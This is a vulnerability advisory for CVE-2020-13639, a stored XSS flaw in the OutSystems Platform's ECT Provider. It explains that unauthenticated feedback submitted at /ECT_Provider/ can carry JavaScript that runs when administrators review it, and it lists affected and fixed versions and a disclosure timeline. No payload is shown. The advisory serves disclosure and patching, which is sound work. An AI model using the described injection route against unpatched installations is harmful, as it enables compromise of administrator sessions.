CVE-2020-13639 - Outsystems ECT Provider Unauthenticated Cross-Site Scripting Stored

1. Vulnerability Properties

Title: Outsystems ECT Provider Unauthenticated Cross-Site Scripting Stored
CVE ID: CVE-2020-13639
CVSSv3 Base Score: 5.4 (AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)
Vendor: OutSystems
Products: OutSystems Platform
Advisory Release Date: 20 Aug 2021
Advisory URL: https://labs.integrity.pt/advisories/CVE-2020-13639
Credits: Discovery by Fábio Gomes <fg[at]integrity.pt>

2. Vulnerability Summary

Outsystems Platform is vulnerable to a stored XSS when a Feedback is submitted at ( /ECT_Provider/). The javascript payload is executed when Administrators check the Feedback submitted by unauthenticated users.

3. Vulnerable Versions

  • Outsystems 10 < 10.0.1005.2
  • Outsystems 11 Platform Server < 11.9.0
  • Outsystems 11 LifeTime Management Console < 11.7.0

4. Solution

  • Upgrade to at least one of the following versions:
    • Outsystems 10 >= 10.0.1005.2
    • Outsystems 11 Platform Server >= 11.9.0
    • Outsystems 11 LifeTime Management Console >= 11.7.0

5. Vulnerability Timeline

  • 20/Feb/2020 - Vulnerability reported to OutSystems
  • 27/Feb/2020 - Vulnerability verified by vendor
  • 4/Sep/2020 - Vulnerability fixed by vendor
  • 20/Aug/2021 - Advisory released

6. References

  • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13639